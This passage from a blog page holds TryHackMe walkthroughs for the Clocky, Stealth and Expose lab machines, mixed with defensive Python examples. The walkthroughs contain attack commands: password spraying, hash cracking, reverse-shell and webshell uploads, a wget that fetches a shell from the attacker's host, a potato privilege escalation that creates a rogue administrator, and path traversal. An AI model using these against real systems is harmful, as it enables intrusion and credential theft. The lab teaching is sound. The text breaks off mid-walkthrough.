Clocky tryhackme walkthrough writeup

TryHackMe- Clocky


Hello folks,
This blog provides a walkthrough for a newly added machine on TryHackMe called “Clocky”. It has been classified as a Medium-level challenge. It will help you understand how to identify misconfigurations on Linux-based web servers using various penetration testing tools and techniques. Let’s proceed without any delay and begin the penetration process.
You can access the Clocky machine on TryHackMe by clicking here.
First, let’s start the machine by clicking “Start Machine”. We can start scanning the obtained IP using nmap with the help of the following command:

nmap -sC <Machine_IP>

1. nmap

We can see that 4 ports are open: SSH (22) and three HTTP ports, 80, 8000, and 8080. Also, we have a robots.txt available here with 3 disallowed entries: *.sql, *.zip, and *.bak. Let’s confirm the same by visiting the robots.txt file using the following URL:

http://<Machine_IP>/robots.txt

We will find the above-mentioned disallowed entries with our first flag.

2. First flag

Now we can use gobuster on every HTTP port to check whether any files with these extensions exist. Using the following command, we will find a file named index.zip on port 8000:

gobuster dir --url http://<Machine_IP>:8000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x sql,bak,zip -t 50

Let’s download the file by visiting the URL on our browser. We need to decompress the file using the following command:

unzip index.zip

After decompressing the file, we will find 2 files; flag2.txt and app.py. We can first read the contents of the flag2.txt file to get our second flag.

3. flag2

The app.py file is a Python script. This file looks like the server-side code of the web application. After reading the code, we can understand that there are some web pages available on port 8080 such as /administrator, /password_reset, and /forgot_password which are related to authentication functionality.
Let’s explore the web pages one by one. If we go to the /administrator page, we will find a login page that requires a username and password. The /forgot_password page asks us for a username, for which a password reset token is generated using the algorithm given in the app.py file. Lines 96-98 of app.py show that the token is derived from the username and the current date and time (down to the second). To generate a token value ourselves, we have to write a Python script.
After exploring, we wrote a code and uploaded it to our GitHub repository. In the script, we need to mention the username for which we want to generate the password reset token. In the app.py file, we found 4 usernames; clocky_user, administrator, jane, and clarice.
We have to run the script for all the users and after running it, we will find a token value that we can use to reset the password of the administrator user.
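As an added illustration (this is not code from the room’s app.py, whose exact token formula is not reproduced here), the following Python contrasts a hypothetical token derived only from the username and the clock with a reset-token store of the kind that would have closed this hole: tokens drawn from the OS CSPRNG, stored only as digests so a leaked table does not yield live tokens, single use, and expiring. The names ResetTokenStore, TOKEN_TTL_SECONDS and weak_reset_token are assumptions of this example.

```python
import hashlib
import secrets
import time

# Hypothetical implementation of the weak pattern the walkthrough describes:
# the token is a function of nothing but the username and the wall clock, so
# anyone who knows the username and roughly when the reset was requested can
# rebuild it. Not the room's actual formula.
def weak_reset_token(username: str, now: float) -> str:
    stamp = time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime(now))
    return hashlib.sha1(f"{username}{stamp}".encode()).hexdigest()


TOKEN_TTL_SECONDS = 15 * 60  # assumed lifetime for a reset link


class ResetTokenStore:
    """Server-side store for password-reset tokens.

    Only the SHA-256 digest of each token is kept, so a leaked copy of the
    table (think database.sql) does not contain usable tokens. A token is
    single use and expires after TOKEN_TTL_SECONDS.
    """

    def __init__(self):
        self._pending = {}  # digest -> (username, expiry timestamp)

    @staticmethod
    def _digest(token: str) -> str:
        return hashlib.sha256(token.encode()).hexdigest()

    def issue(self, username: str, now: float) -> str:
        # 32 bytes from the OS CSPRNG: unguessable regardless of username or time
        token = secrets.token_urlsafe(32)
        self._pending[self._digest(token)] = (username, now + TOKEN_TTL_SECONDS)
        return token

    def redeem(self, token: str, now: float):
        """Return the username the token belongs to, or None if the token is
        unknown, already used, or expired. A matching entry is removed on
        lookup, which is what makes the token single use."""
        entry = self._pending.pop(self._digest(token), None)
        if entry is None:
            return None
        username, expiry = entry
        if now > expiry:
            return None
        return username
```

The weak function returns the same value for every request that lands in the same second, which is exactly the property that makes the room’s token recoverable; the store does not depend on the username or the time at all, so there is nothing to reconstruct.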

4. Got token

Now, to reset the password, we need to visit the /password_reset webpage and supply the obtained token value in a parameter called token, as follows:

http://<Machine_IP>:8080/password_reset?token=<Token_Value>

We will find that we can successfully reset the password of the administrator user. Now we can visit the /administrator webpage and finally log in as the administrator user with the newly updated password. There we will find our third flag.

5. Flag3
 

Getting Foothold on Clocky

On the admin page, we have a functionality to download any file that is hosted on the web server but if we try to download any webpage using the following URL, we get an error saying “Action not permitted”:

http://localhost

We can bypass it by converting some characters to upper case. Also, we saw a database file in app.py named database.sql, so let’s try to download it by providing the following URL to the specified location:

http://Localhost/database.sql

We will find that the file is downloaded successfully. If we open the file we will find the fourth flag.
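The bypass works because the server compares the raw URL string, so a different letter case slips past the check. The following Python is an added example (not the room’s app.py) showing that naive check next to a validation that normalises the hostname, resolves it, and rejects anything that points at loopback, private, link-local or otherwise internal addresses, failing closed when the name does not resolve. The resolver is injectable so the check can be exercised offline; is_safe_fetch_url and naive_is_blocked are names chosen for this example.

```python
import ipaddress
import socket
from urllib.parse import urlsplit


def naive_is_blocked(url: str) -> bool:
    """The kind of check the walkthrough defeats: a case-sensitive substring
    match on the raw URL (hypothetical, not the room's real code)."""
    return "localhost" in url or "127.0.0.1" in url


def resolve(host: str) -> list:
    """Default resolver: every address the name maps to; empty on failure."""
    try:
        return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})
    except socket.gaierror:
        return []


def _is_internal(ip) -> bool:
    # Anything that is not a plain public unicast address is refused.
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_reserved or ip.is_multicast or ip.is_unspecified)


def is_safe_fetch_url(url: str, resolver=resolve) -> bool:
    """True only for http(s) URLs whose host resolves exclusively to public addresses."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False
    host = parts.hostname  # normalised by urlsplit: lowercased, IPv6 brackets removed
    if not host or parts.username or parts.password:
        return False
    try:
        # Literal IP address: no DNS lookup needed.
        return not _is_internal(ipaddress.ip_address(host))
    except ValueError:
        pass
    addrs = resolver(host)
    if not addrs:
        return False  # fail closed when the name does not resolve
    for addr in addrs:
        try:
            if _is_internal(ipaddress.ip_address(addr)):
                return False
        except ValueError:
            return False
    return True
```

One caveat the code cannot remove on its own: the lookup here and the lookup the HTTP client performs later are two separate resolutions, so a DNS answer that changes between them (rebinding) still needs to be handled by pinning the resolved address when the request is made.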

6. Flag4

If we further read the contents of the database.sql file, we will see that we have a password that we can try for different users to log in. Let’s create a wordlist for usernames and add the previously obtained usernames to the file. We can use this wordlist to perform a password-spraying attack with the help of the hydra tool using the following command:

hydra -L username.txt -p "Obtained_Password" ssh://<Machine_IP> -t 10

We will find that we obtained the SSH password for clarice user.
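From the server’s side, a spray like this has a distinctive shape in auth.log: one source address, few passwords, many different usernames, as opposed to a brute force that hammers one account. The following Python is an added detection example, not part of the original post; the log lines are constructed in sshd’s syntax and the function names summarise and detect_spray are my own.

```python
import re
from collections import defaultdict

# Constructed sample in auth.log / sshd syntax, not real data from the room.
SAMPLE_AUTH_LOG = """\
Mar 10 12:00:01 clocky sshd[1201]: Failed password for clocky_user from 10.10.14.5 port 51000 ssh2
Mar 10 12:00:01 clocky sshd[1202]: Failed password for administrator from 10.10.14.5 port 51001 ssh2
Mar 10 12:00:02 clocky sshd[1203]: Failed password for invalid user jane from 10.10.14.5 port 51002 ssh2
Mar 10 12:00:02 clocky sshd[1204]: Accepted password for clarice from 10.10.14.5 port 51003 ssh2
Mar 10 12:05:00 clocky sshd[1300]: Failed password for root from 10.10.14.9 port 40000 ssh2
Mar 10 12:05:01 clocky sshd[1301]: Failed password for root from 10.10.14.9 port 40001 ssh2
Mar 10 12:05:02 clocky sshd[1302]: Failed password for root from 10.10.14.9 port 40002 ssh2
"""

# "invalid user" appears when the account does not exist; the name still counts.
LINE_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def summarise(lines):
    """Per source IP: usernames that failed, failure count, usernames that succeeded."""
    per_ip = defaultdict(lambda: {"failed_users": set(), "failures": 0, "accepted": set()})
    for line in lines:
        m = LINE_RE.search(line)
        if not m:
            continue
        rec = per_ip[m["ip"]]
        if m["result"] == "Failed":
            rec["failed_users"].add(m["user"])
            rec["failures"] += 1
        else:
            rec["accepted"].add(m["user"])
    return per_ip


def detect_spray(lines, min_users=3):
    """Report sources that failed against at least min_users distinct accounts.

    Returns (ip, sorted failed users, sorted accepted users). A single account
    hit many times (classic brute force) is deliberately not reported here; the
    accepted set tells you whether the spray eventually landed.
    """
    hits = []
    for ip, rec in summarise(lines).items():
        if len(rec["failed_users"]) >= min_users:
            hits.append((ip, sorted(rec["failed_users"]), sorted(rec["accepted"])))
    return hits
```

The sample deliberately mixes a spray that ends in a successful login with an unrelated single-account brute force, so the two are told apart by the number of distinct usernames rather than by the raw failure count; a production version would also bucket by time window, which the year-less syslog timestamps make awkward in a few lines.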

7. bruteforce

Let’s access the target machine using this credential pair with the help of the following command:

ssh clarice@<Machine_IP>

After logging in to the machine, we will find our fifth flag in the home directory of the clarice user.
 

Privilege Escalation on Clocky

To get root access to the machine, we have to find a way. If we check the contents of our home directory, we will find a folder named app under which we have an .env file. If we check the file, we will find the password for the MySQL database. So, let’s access the database using the following command:

mysql -u clocky_user -p

After running the above command, we will be asked to provide the obtained password. We successfully got access to the MySQL database. Now we can use the following commands to search for databases, tables, and their contents.

show databases;
use mysql;
select * from user;

After running these commands we got some hashes, but these values are stored in MySQL’s own caching_sha2_password format and have to be converted before a cracking tool can use them. After a lot of research, we found a way to obtain the password hashes of MySQL users in a usable form. We need to know the version of the MySQL server for this to work. We can check the same using the following command:

mysql -V

After running the above command, we can see that the version of MySQL is 8.0.34-0ubuntu0.20.04.1.
We found an article describing the method for MySQL version 8. We can get the SHA256 hashes for all users using the following query:

SELECT `User`, CONCAT('$mysql',LEFT(authentication_string,6),'*',INSERT(HEX(SUBSTR(authentication_string,8)),41,0,'*')) AS hash FROM mysql.user WHERE plugin = 'caching_sha2_password' AND authentication_string NOT LIKE '%INVALIDSALTANDPASSWORD%' AND authentication_string != '';

Now we need to copy each hash and provide the same to hashcat tool to crack them using the following command:

hashcat -m 7401 -a 0 hash.txt /usr/share/wordlists/rockyou.txt -O --session hash.txt

Here the hash mode is MySQL SHA256 hash. After a few minutes, we will find that one of the provided hashes is cracked, and we can see the clear text password using the following command:

hashcat -m 7401 --show hash.txt

8. roots password

Finally, let’s try this password for the root user, and we will find that we are successfully logged in as root. Now we can read the sixth flag and solve the CTF.

In this machine, we understood the MySQL-related vulnerabilities and used many penetration testing tools like nmap, gobuster, hydra, and hashcat. We hope that the concepts and techniques discussed in this blog have been clear to you.
You can check out our other blogs on TryHackMe rooms here.

Happy Pentesting!!!
Team CyberiumX

TryHackMe- Stealth

Hello folks,
This blog focuses on a medium-level machine called ‘Stealth‘ available on the ‘TryHackMe‘ platform, offering a chance to breach a Windows operating system. This challenge acts as an initial assessment to gauge your proficiency in red teaming abilities. The ‘Stealth‘ machine will test your skill in utilizing Pentesting tools such as Rustscan, Netcat, PowerShell scripts, csc.exe, and more. Let’s begin the penetration testing process promptly without any delay.
You can access the Stealth machine on TryHackMe.
First of all let’s start the machine by clicking on ‘Start Machine’ and after waiting for 3-4 minutes, scan the obtained IP using the tool ‘Rustscan’.

rustscan -a <Machine_IP>

1. Rustscan

After getting the results from Rustscan, we cannot say what services are running on some specific ports. We can run nmap to grab banners related to those ports and get their service versions using the following command:

nmap -sS -sV -p5985,7680,8000,8080,8443,47001,49664-49680 <Machine_IP>

1.1 nmap sv

Getting User Access on Stealth

We have 15 ports open on the target machine where HTTP service is running on 5 ports- 5985, 8000, 8080, 8443 and 47001. Also, in the lab description we are provided with <Machine_IP>:8080 port on which HTTP service is running. So, let’s open our web browser and access the 8080 port.

2. Webpage 1

We have an upload functionality for ‘Powershell Script Analyzer’ on the website. Let’s find a reverse shell script written in powershell language on the internet, change the IP address to our own tun0 IP address and specify an available port.

3. malicious file

Now, we have to upload the script into the functionality provided on the webpage. Before uploading the .ps1 file, we have to start listening using netcat as follows:

nc -nlvp 1337

After uploading the reverse shell script, we have to wait for 3-4 seconds as the script will be analysed on the server and we will get the reverse connection on our netcat listener.

4. Got first access

After waiting, we can see that we got the reverse shell connection as ‘evader’ user. In order to hunt for the user flag, let’s move to ‘C:\Users\evader\Desktop’ and there we will find a file with the name ‘encodedflag’. If we read the file, we can see that the message is encoded with the Base64 encoding algorithm.

5. Encoded flag

We can decode the message using the following command:

echo "<Encoded_message>" | base64 -d

After running the command we will get a hint saying that we have to visit the provided URL in order to get the flag.

6. hint for flag

Let’s visit the provided URL on the browser to get the flag. There is another hint mentioned on the webpage. The hint says that we have to remove the logs from the server for the uploaded files.

7. Another hint

If we go to the web directory located at ‘C:\xampp\htdocs’, we will find an ‘uploads’ directory under which we have a file named ‘log.txt’. Let’s delete the file using the following command:

del log.txt

9. Logfile

After deleting the logs, if we refresh the webpage we will find our user flag. This confirms that we have user-level access on the target machine. Now we have to perform privilege escalation to become Administrator.
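The hint in this step is a reminder of a real weakness: the web service account can delete its own upload log, so the record of what was uploaded disappears with one command. Shipping logs off the host is the primary fix; a cheap complement is a tamper-evident log in which each record carries the hash of the previous one, so a deleted, edited or reordered entry breaks the chain at the next verification. The Python below is an added example, not code from the room, with constructed upload events; GENESIS, append_entry and verify_chain are names chosen here.

```python
import hashlib
import json

# Anchor for the first record. In practice keep this and periodic "head" hashes
# somewhere the web server account cannot write (another host, a WORM store).
GENESIS = "0" * 64


def _hash_record(prev_hash: str, entry: dict) -> str:
    body = json.dumps(entry, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256((prev_hash + body).encode()).hexdigest()


def append_entry(chain: list, entry: dict) -> dict:
    """Append an entry, linking it to the hash of the record before it."""
    prev_hash = chain[-1]["hash"] if chain else GENESIS
    record = {"entry": entry, "prev": prev_hash, "hash": _hash_record(prev_hash, entry)}
    chain.append(record)
    return record


def verify_chain(chain: list, expected_head: str = None):
    """Return None if the chain is intact, else the index of the first bad record.

    Editing or removing a record breaks the link at that position or the next.
    Truncating the tail is only caught when expected_head (the last hash you
    stored elsewhere) is supplied; then len(chain) is returned for a short chain.
    """
    prev_hash = GENESIS
    for i, record in enumerate(chain):
        if record["prev"] != prev_hash or record["hash"] != _hash_record(prev_hash, record["entry"]):
            return i
        prev_hash = record["hash"]
    if expected_head is not None and prev_hash != expected_head:
        return len(chain)
    return None


def build_sample_chain() -> list:
    """Constructed upload events in the shape an analyzer's log might record."""
    chain = []
    append_entry(chain, {"ts": "2024-03-10T13:00:00Z", "file": "report.ps1", "src": "10.10.14.5"})
    append_entry(chain, {"ts": "2024-03-10T13:02:10Z", "file": "analysis.ps1", "src": "10.10.14.5"})
    append_entry(chain, {"ts": "2024-03-10T13:05:42Z", "file": "vulnerable.ps1", "src": "10.10.14.5"})
    return chain
```

The chain makes tampering detectable, not impossible: whoever can rewrite the file can also recompute every hash after the edit, which is why the head hash has to live where the same account cannot reach it.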
 

Privilege Escalation on Stealth

There is a file in the ‘uploads’ directory named ‘vulnerable.ps1’. Let’s try to read the contents of the file using the ‘type’ command.

10. vulnerable ps1 file

We can see that the contents of this file give us a reverse shell as the same user. Let’s copy the contents of this file, open another terminal on our machine, create a file with the same name and paste the contents in. We have to replace the IP address with our tun0 IP and mention an available port number.
Now we have to upload the modified vulnerable.ps1 file to the web server, which will overwrite the original file with the new one. Then we can simply start listening with netcat and execute the script with the help of the following commands:

On our machine: nc -nlvp 1234
On target machine: ./vulnerable.ps1

We can see that we got a reverse shell on the netcat listener.

11. got another shell

We have to check our privilege as evader user on this shell for which we can use the following command:

whoami /priv

The listed privileges are not exploitable, so we cannot take advantage of them. We can use a privilege escalation script to identify other ways to become the Administrator/System user on this machine. There is a script written in PowerShell called ‘PrivescCheck’. Let’s download it from GitHub and upload it through the file upload functionality available on the website.
Now let’s execute the script using the following command mentioned on the GitHub repository:

powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"

It will take a minute to generate the output.

12. priv esc vuln

If we check under the ‘Service Binary permissions’ section, we will find that the evader user has full permissions on the Apache2.4 service and can use it to get full access as the ‘Evader’ user on this machine.
We can use ‘P0wny Shell‘ here. Let’s download it on our machine from Github and then upload it on target machine by creating a python3 web server using following command:

python3 -m http.server 7777

Now on target machine use the following command to download the malicious script at ‘c:\xampp\htdocs’ directory:

wget http://<Your_IP>:7777/p0wny.php -o p0wny.php

13. uploading p0wny shell

We will find the malicious file is downloaded and now can be executed from the website using our web browser. Make a request to the following URL:

http://<Machine_IP>:8080/p0wny.php

This executes the web shell and gives us command execution in the context of the web server. Now we can check our level of privilege on the target machine using the following command:

whoami /priv

14. got shell on web

In the output, we can see that we have a vulnerable privilege available ‘SeImpersonatePrivilege’ which can be exploited with the help of EfsPotato.
In this GitHub repository, we have a ‘.cs’ file which we have to compile on the target machine. Let’s download this file on our Kali machine and host it with the python3 web server again, so that we can fetch it on the target machine using the following command:

wget http://<Your_IP>:7777/EfsPotato.cs -o EfsPotato.cs

15. efs file download

After downloading the file, we have to compile it into an exe file using the commands given in the same GitHub repository. But before that, we have to find the version of the installed Microsoft .NET Framework, so that we can use its C# compiler, csc.exe, to compile the .cs file and produce an executable (.exe) file.
If we try to change the directory to ‘C:\Windows\Microsoft.NET\framework’, we will find the version of it. The version is ‘v4.0.30319’. Now we have to go back to ‘C:\xampp\htdocs’ directory and type the following command in order to compile the file:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe EfsPotato.cs -nowarn:1691,618

16. efs file created

If we check our current directory, we will find a newly created exe file, ‘EfsPotato.exe’. Finally, we use this binary to try to execute commands as the ‘System’ user. Let’s run the following command to confirm the same:

EfsPotato.exe "whoami"

We will find that we are running these commands as the ‘System’ user. Great! Now we need a way to become Administrator. We can use commands that create a new user on the machine and add that user to the ‘administrators’ group, so that we can access the machine over RDP and run any binary as an administrator. The command is as follows:

EfsPotato.exe "cmd.exe /c net user CyberiumX Password@123 /add && net localgroup administrators CyberiumX /add"

where, ‘CyberiumX’ is the name of the user and ‘Password@123’ is the login password for this user.

Note- The target Windows machine has a password policy that only allows strong passwords containing uppercase letters, lowercase letters, special characters and numbers.
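A local account being created and then dropped into Administrators within seconds is one of the loudest signals this chain leaves in the Windows Security log (event 4720, user created, followed by 4732, member added to a security-enabled local group). The Python below is an added detection example, not part of the original post; the events are constructed and simplified (a real 4732 identifies the member by SID, and both events carry many more fields), and find_new_local_admins is a name chosen here.

```python
from datetime import datetime, timedelta

# Constructed, simplified Security-log records; not data from the room.
# 4720: account created. 4732: member added to a local group (TargetUserName is
# the group, MemberName the account; real events carry the member's SID).
SAMPLE_EVENTS = [
    {"time": "2024-03-10T08:00:00", "EventID": 4720, "SubjectUserName": "itadmin", "TargetUserName": "svc_backup"},
    {"time": "2024-03-10T09:00:00", "EventID": 4720, "SubjectUserName": "hrops", "TargetUserName": "newhire"},
    {"time": "2024-03-10T10:30:00", "EventID": 4732, "SubjectUserName": "hrops", "MemberName": "newhire",
     "TargetUserName": "Remote Desktop Users"},
    {"time": "2024-03-10T11:00:00", "EventID": 4732, "SubjectUserName": "itadmin", "MemberName": "svc_backup",
     "TargetUserName": "Administrators"},
    {"time": "2024-03-10T13:00:00", "EventID": 4720, "SubjectUserName": "SYSTEM", "TargetUserName": "CyberiumX"},
    {"time": "2024-03-10T13:00:01", "EventID": 4732, "SubjectUserName": "SYSTEM", "MemberName": "CyberiumX",
     "TargetUserName": "Administrators"},
]

ADMIN_GROUPS = {"Administrators"}


def _ts(event) -> datetime:
    return datetime.fromisoformat(event["time"])


def find_new_local_admins(events, window=timedelta(minutes=10)):
    """Correlate 4720 with a later 4732 into an admin group for the same account.

    Returns one dict per account that was created and made a local administrator
    within `window`. A long gap (svc_backup above, three hours) is left for a
    separate, lower-priority rule so that this one stays high-signal.
    """
    created = {}  # account -> (creation time, who created it)
    findings = []
    for ev in sorted(events, key=_ts):
        if ev["EventID"] == 4720:
            created[ev["TargetUserName"]] = (_ts(ev), ev["SubjectUserName"])
        elif ev["EventID"] == 4732 and ev["TargetUserName"] in ADMIN_GROUPS:
            member = ev["MemberName"]
            if member not in created:
                continue
            born, creator = created[member]
            gap = _ts(ev) - born
            if timedelta(0) <= gap <= window:
                findings.append({
                    "user": member,
                    "created_by": creator,
                    "added_by": ev["SubjectUserName"],
                    "seconds_between": gap.total_seconds(),
                })
    return findings
```

The subject being SYSTEM is itself worth a second look in the output: administrators normally create accounts under their own name, while a token-impersonation tool leaves the machine account as the actor.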

17. created a user

We will find that the command is executed successfully. Now let’s try to login on the target machine with ‘CyberiumX’ user as the RDP port (3389) is open on the target machine. We can use the following command to get graphical access on the machine:

xfreerdp /v:<Machine_IP> /u:CyberiumX /p:Password@123 /workarea /smart-sizing

After getting access to the machine, we can execute Command Prompt using the ‘Administrator’ user as we are a part of the administrators group. After getting the administrator shell we can move to ‘C:\Users\Administrator\Desktop’ location and read the contents of the flag.

18. got administrator

We have successfully compromised the Stealth machine of TryHackMe.
In this CTF, we learned about some new concepts for getting access using different powershell scripts. You can check out our other blogs for compromising Windows machines on CyberiumX.

 

Happy Pentesting!!!

Team CyberiumX

TryHackMe- Expose

Hello folks,
This blog centers around a beginner-level machine named ‘Expose‘ on the ‘TryHackMe‘ platform, which presents an opportunity to infiltrate a Linux system. This challenge serves as an initial evaluation to measure your competence in the realm of red teaming skills. The ‘Expose‘ machine will assess your aptitude in employing Pentesting tools like Nmap, Rustscan, Gobuster, Sqlmap, Netcat, webshells and various others. Let’s not waste any time and kickstart the penetration testing journey without delay.

You can access the Expose machine on TryHackMe by clicking here.
First of all let’s start the machine by clicking on “Start Machine”.

Scan the obtained IP using Nmap:

nmap -sV <Machine_IP>

We have identified three accessible ports on this machine: 21 (FTP), 22 (SSH) and 53 (DNS). This configuration seems unusual, prompting us to initiate an extensive port scan using Nmap. However, due to the lengthy wait for Nmap results, we opted for a quicker alternative and employed Rustscan using the following command:

rustscan -a <Machine_IP>

We got two additional open ports here i.e. 1337 and 1883. Now we can use nmap to specifically scan these two ports with the help of following command:

nmap -p1337,1883 -sV <Machine_IP>

3. nmap 1337
So, we have a web service running on TCP 1337 and a Mosquitto (MQTT broker) service running on TCP 1883. Now let’s try to access the web page on port 1337.
Also, let us fire-up Gobuster to perform directory busting on the web server using the following command:

gobuster dir -u http://<Machine_IP>:1337 -w /usr/share/wordlists/dirb/big.txt -t 50

5. Gobuster

Getting Foothold on Expose

Among the pages we’ve discovered, /admin_101 stands out as particularly promising as there is already a default email address pre-populated in the Email field.

6. login page

Our objective is to pinpoint any authentication related vulnerabilities. To achieve this, we’ll employ sqlmap with a POST request, requiring us to activate Burp Suite. Through Burp Suite, we’ll send the POST request with an arbitrary password while proxying the request.
7. Burp request
We can simply copy the request and paste it in any file (req) and finally supply the same file to sqlmap with the help of following command:

sqlmap -r req --dump

8. sqlmap output

At this point, we can effortlessly copy the password associated with the user whose email is hacker@root.thm and access the /admin_101 page. However, upon accessing the webpage, we did not discover any valuable information.

9. logged in

Returning to the output provided by sqlmap, we observe the presence of additional webpages. Upon attempting to access these pages, we are prompted to input the password we have already successfully cracked.
10. file1010111 password
Let’s provide the password and submit it. After that, we get a line which looks like a hint. It says something about parameters and that something is hidden.
11. hint for parameter fuzz
We can examine the page’s source code to search for any concealed elements. Our inspection yielded a discovery related to a ‘file‘ parameter that bears a resemblance to a GET parameter.
12. source code for hint
Considering the existence of a parameter named ‘file‘ it’s plausible to explore the possibility of exploiting a directory traversal vulnerability to access internal system files. To initiate this, I supplied the fundamental sequence for a directory traversal vulnerability as outlined below:

?file=../../../../../../etc/passwd

And boom we got the contents of passwd file in the response from the server.
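The `file` parameter is handed to the filesystem as-is, which is why `../` sequences climb out of the intended directory. The usual fix is to resolve the requested name against a fixed base directory and refuse anything whose final, symlink-resolved location is not inside it. The Python below is an added example (not the room’s PHP); resolve_under is a name chosen here and the base directory in the usage is hypothetical.

```python
from pathlib import Path


def resolve_under(base_dir: str, requested: str):
    """Map a user-supplied path onto base_dir.

    Returns the absolute path as a string, or None if the resolved location is
    outside base_dir. Because Path.resolve() follows symlinks, a link inside the
    directory that points outside it is rejected as well. Absolute requests are
    treated as relative so "/etc/passwd" cannot replace the base.
    """
    base = Path(base_dir).resolve()
    try:
        target = (base / requested.lstrip("/\\")).resolve()
        target.relative_to(base)  # raises ValueError when target is not under base
    except (ValueError, OSError):
        # ValueError: escaped the base, or an embedded NUL byte
        # OSError: a component could not be resolved
        return None
    return str(target)
```

Where the set of files is small, an allowlist (a dict from short names to paths) is simpler still and removes the filesystem from the decision entirely.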

13. Got Dir traversal

We’ve identified a user with a username commencing with the letter ‘z‘ which corresponds to the hint obtained from sqlmap’s output. Consequently, we’ll proceed to access the second webpage located at /upload-cv00101011/index.php and submit the username of the user that starts with ‘z‘.
14. Upload page access
On this page, there’s an upload feature that presents an opportunity to upload a PHP-based webshell, enabling us to establish a foothold on the machine. However, upon inspecting the source code of the upload page, we noticed the presence of a client-side filter, restricting us to uploading only PNG or JPG files.
15. jpg and png allowed
We possess various techniques to circumvent this restriction. Initially, let’s configure our PHP webshell, sourced from pentestmonkey. This entails substituting the IP address with our own tunnel IP and specifying the desired listening port.
16. Change IP for rev shell
Now we can simply rename our webshell and change the extension from php to php.jpg with the help of following command:

mv php-reverse-shell.php php-reverse-shell.php.jpg

17. rename revshell
Following the configuration of our webshell, the next step involves intercepting the request using Burp Suite and attempting to upload our webshell via the upload portal. While the request is intercepted in Burp Suite, we’ll modify the file extension back to ‘php‘. Once this adjustment is made, we can proceed to forward the request, resulting in the successful upload of the file.
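Renaming the file and then editing the request in a proxy works only because the filter lives in the browser. Server-side, the decision has to be made on the request as received: accept a short allowlist of extensions judged on the final suffix alone, confirm the bytes actually start like the claimed image type, and never write the client’s filename to disk. The Python below is an added example of that check, not the room’s upload handler; validate_upload and ALLOWED are names chosen here, and the sample uploads are constructed.

```python
import secrets
from pathlib import PurePosixPath

# Allowed extension -> magic bytes the file must begin with.
ALLOWED = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
}


def validate_upload(client_filename: str, data: bytes):
    """Return (ok, reason, stored_name).

    Only the last extension counts, so "shell.php.jpg" is judged as .jpg (and
    then fails the content check) while "shell.jpg.php" is refused outright.
    The name written to disk is random, with a canonical extension, so nothing
    the client chose ever reaches the filesystem.
    """
    # Drop any directory component the client may have sent.
    name = PurePosixPath(client_filename.replace("\\", "/")).name
    ext = PurePosixPath(name).suffix.lower()
    if ext not in ALLOWED:
        return False, f"extension {ext or '(none)'} not allowed", None
    if not data.startswith(ALLOWED[ext]):
        return False, "content does not match declared image type", None
    stored = secrets.token_hex(16) + (".jpg" if ext == ".jpeg" else ext)
    return True, "ok", stored
```

A magic-byte check does not stop a polyglot (valid image header followed by script), so the second half of the defence is that the upload directory is never served by a script handler: store it outside the web root, or disable execution for that path.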

18. removed jpg

Now we need to find the web page where all the uploaded files can be accessed. Again, there is hidden content in the source code of the page which provides the path of the upload folder.
20. Upload folder
Let’s go to that page and we will find our file uploaded there with the proper extension as php.
Now before executing the file, we need to start listening on same mentioned port using netcat as follows:

nc -nlvp 1234

After this, as soon as we execute our webshell, we will get the reverse connection back on our kali machine.
22. Got rev shell
Great!!! We got the foothold on Expose machine.
Let’s go to the /home directory and try to access the home directory of the user whose username starts with z. We will find 2 files named flag.txt and ssh_creds.txt. If we try to access the flag, we get a permission denied error. So I tried to access the second file and got the password for the user.
23. Got ssh pass for zeamkish
Now as we have the password for the user so we can simply login using ssh with the help of following command:

ssh <username>@<Machine_IP>

24. Got access using ssh
We can simply read the user flag now.
 

Privilege Escalation on Expose

Now we need to perform privilege escalation to become root user. So for that we have to try many methods out of which SUID bit method looks promising. We can use the following command for that:

find / -type f -perm -u=s 2>/dev/null

25. Got user and priv ecs
The output is very long, but it contains 2 binaries that will help us get root access, i.e. find and nano. We will go with nano and change the root user’s password in the shadow file. In order to escalate privileges with this method, we first need to create a password hash, which we can do with the mkpasswd command as follows:
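An editor with the setuid bit is the kind of thing a periodic audit should catch long before a CTF player does: list every setuid regular file and compare it with the set the distribution is expected to ship. The Python below is an added example, not part of the original post; the baseline is an illustrative subset you would replace with one taken from a known-good build of your own image, and the demo function builds a scratch directory with one setuid file so the audit can be exercised without touching the real filesystem.

```python
import os
import stat
import tempfile

# Illustrative subset of setuid binaries a stock Ubuntu install is expected to
# have. Generate the real baseline from a clean image of your own build.
EXPECTED_SETUID = {
    "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/passwd", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/mount",
    "/usr/bin/umount", "/usr/bin/fusermount3", "/usr/bin/pkexec",
}


def find_setuid(root: str) -> list:
    """Every regular file under root with the setuid bit set (symlinks are skipped)."""
    found = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for fn in filenames:
            path = os.path.join(dirpath, fn)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue  # vanished or unreadable; move on
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(path)
    return sorted(found)


def unexpected_setuid(root: str, baseline=EXPECTED_SETUID) -> list:
    """Setuid files under root that are not in the baseline (e.g. nano or find)."""
    return [p for p in find_setuid(root) if p not in baseline]


def demo_in_tempdir() -> list:
    """Constructed example: a scratch tree with one setuid and one normal file.
    Returns the basenames the audit flags (no root privileges needed, because
    the owner of a file may set its setuid bit)."""
    root = tempfile.mkdtemp()
    suspicious = os.path.join(root, "suspicious_nano")
    plain = os.path.join(root, "normal_tool")
    for path in (suspicious, plain):
        with open(path, "wb") as fh:
            fh.write(b"#!/bin/sh\n")
    os.chmod(suspicious, 0o4755)
    os.chmod(plain, 0o755)
    return [os.path.basename(p) for p in unexpected_setuid(root)]


if __name__ == "__main__":
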